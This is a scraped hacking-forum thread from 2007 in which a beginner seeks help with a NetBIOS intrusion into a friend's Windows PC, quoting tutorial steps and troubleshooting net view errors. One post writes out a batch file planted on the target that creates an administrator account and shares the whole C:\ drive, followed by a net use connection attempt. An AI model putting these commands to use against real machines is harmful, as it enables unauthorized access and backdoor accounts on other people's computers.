Follow us on Twitter!
Don't judge the unknown - Grindordie
Wednesday, April 23, 2014
Navigation
Home
HellBoundHackers Main:
HellBoundHackers Find:
HellBoundHackers Information:
Learn
Communicate
Submit
Shop
Challenges
HellBoundHackers Exploit:
HellBoundHackers Programming:
HellBoundHackers Think:
HellBoundHackers Track:
HellBoundHackers Patch:
HellBoundHackers Other:
HellBoundHackers Need Help?
Other
Members Online
Total Online: 16
Guests Online: 15
Members Online: 1

Registered Members: 82876
Newest Member: bhl1986
Latest Articles
View Thread

HellBound Hackers | HellBound Hackers | Questions

Author

Netbios hacking


Member

Your avatar

Posts:
Location:
Joined: 01.01.70
Rank:
Guest
Posted on 04-04-07 21:44
Hey im quite new on this website and im spending much time in reading and learning how to hack. I was reading the article about hacking someones harddisk, and i came to this point
Name Type Status
-------------------------------------------------------------------------------------------------
user <00> UNIQUE Registered
workgroup <00> GROUP Registered
user <03> UNIQUE Registered
user <20> UNIQUE Registered


MAC Address = 00-02-44-14-23-E6

Note the <20>. It shows that the victim has enabled the file and printer sharing. So other wise if the <20> isnt there then its also not vulnerable.


I did this step and i got the same message witch showed the system of my victem is vulnerable (victem is in my case a good friend witch allowed me to try and hack him)

bUt now i stumbled acros the next step

Next we will use cmd. Type in the following: net view \127.0.0.1

If you get this then your good again:

Shared resources at \203.195.136.156
ComputerNameGoesHere

Share name Type Used as Comment


When i type: net view \127.0.0.1 it tells me: system error 123
when i type: net view\127.0.0.1 i come into some sort of menu:

net [ACCOUNTS | COMPUTERS | CONFIG | CONTINUE | FILE | GROUP etc. etc.


does anyone know what i am doing wrong?Sad
Author

RE: Netbios hacking

Uber0n
Member



Posts: 1963
Location: Sweden‭‮
Joined: 13.06.06
Rank:
Hacker Level 3
Posted on 04-04-07 21:49
I think it's just about the slash in front of the IP ^^

You'll find some examples here:
http://www.ss64.c. . .share.html


img230.imageshack.us/img230/724/uber0nsig3hj6.gif
http://uber0n.web. . .
Nope http://uber0n.webs.com/
Author

RE: Netbios hacking


Member

Your avatar

Posts:
Location:
Joined: 01.01.70
Rank:
Guest
Posted on 06-04-07 12:42
Ok. I tryed some things but it still doesnt work. I made a screenshot of my dos. Can u tell me what im doing wrong?

redroest.my-php.net/pictures/dos.JPG

Edited by on 06-04-07 12:43
Author

RE: Netbios hacking


Member

Your avatar

Posts:
Location:
Joined: 01.01.70
Rank:
Guest
Posted on 06-04-07 22:07
Ïm still getting the same error. Does this mean that my friends pc is still secure?
Author

RE: Netbios hacking


Member

Your avatar

Posts:
Location:
Joined: 01.01.70
Rank:
Guest
Posted on 07-04-07 01:45
Is there another way to get into a windows pc?
Author

RE: Netbios hacking


Member

Your avatar

Posts:
Location:
Joined: 01.01.70
Rank:
Guest
Posted on 07-04-07 01:49
ya, theres about a million


Author

RE: Netbios hacking


Member

Your avatar

Posts:
Location:
Joined: 01.01.70
Rank:
Guest
Posted on 08-04-07 00:07
Looks like i must try to get some info myself :happy:
Author

RE: Netbios hacking


Member

Your avatar

Posts:
Location:
Joined: 01.01.70
Rank:
Guest
Posted on 08-04-07 02:47
when u see the "net [menu | other menu]"
that can only be because of you got the syntax wrong so its showing you the correct one

net view\127.0.0.1
you gotta put a space like this net view \127.0.0.1 (and i tihnk the slash is worng too)




Edited by on 08-04-07 02:48
Author

RE: Netbios hacking


Member

Your avatar

Posts:
Location:
Joined: 01.01.70
Rank:
Guest
Posted on 11-04-07 20:32
Ok i started with a new aprouch.

I managed to get a bat file into the victims system. The batfile contained the following:

net user redroest /add
net localgroup administrators redroest /add
net share system=C:\ /unlimited


In my own command prompt I typed the following:

net use \\ip redroest


Now it tells me: ''system error 53 has occured''
What am i doing wrong? I tryed many things but nothing worked. (When I ping the ip it shows a near perfect connection)
Author

RE: Netbios hacking


Member

Your avatar

Posts:
Location:
Joined: 01.01.70
Rank:
Guest
Posted on 11-04-07 22:00
Does netbios hacking even work anymore?


Author

RE: Netbios hacking


Member

Your avatar

Posts:
Location:
Joined: 01.01.70
Rank:
Guest
Posted on 11-04-07 22:22
ya, it works, but there are VERY few vulnerable computers anymore.


Author

RE: Netbios hacking


Member

Your avatar

Posts:
Location:
Joined: 01.01.70
Rank:
Guest
Posted on 12-05-07 03:11
I've seen a bunch of tutorials / info on this type of hacking, so I would recommend you go checking those out ( I think there are some on this site, actually ).
Author

RE: Netbios hacking


Member

Your avatar

Posts:
Location:
Joined: 01.01.70
Rank:
Guest
Posted on 12-05-07 03:36
this may sound like a really really stupid question but i have seen people do this before: are you acctually typing in '127.0.0.1' or are you typing in your target ip?


Author

RE: Netbios hacking


Member

Your avatar

Posts:
Location:
Joined: 01.01.70
Rank:
Guest
Posted on 12-05-07 04:42
lol 127.0.0.1 will come back to you, so any attack you try to do will come right back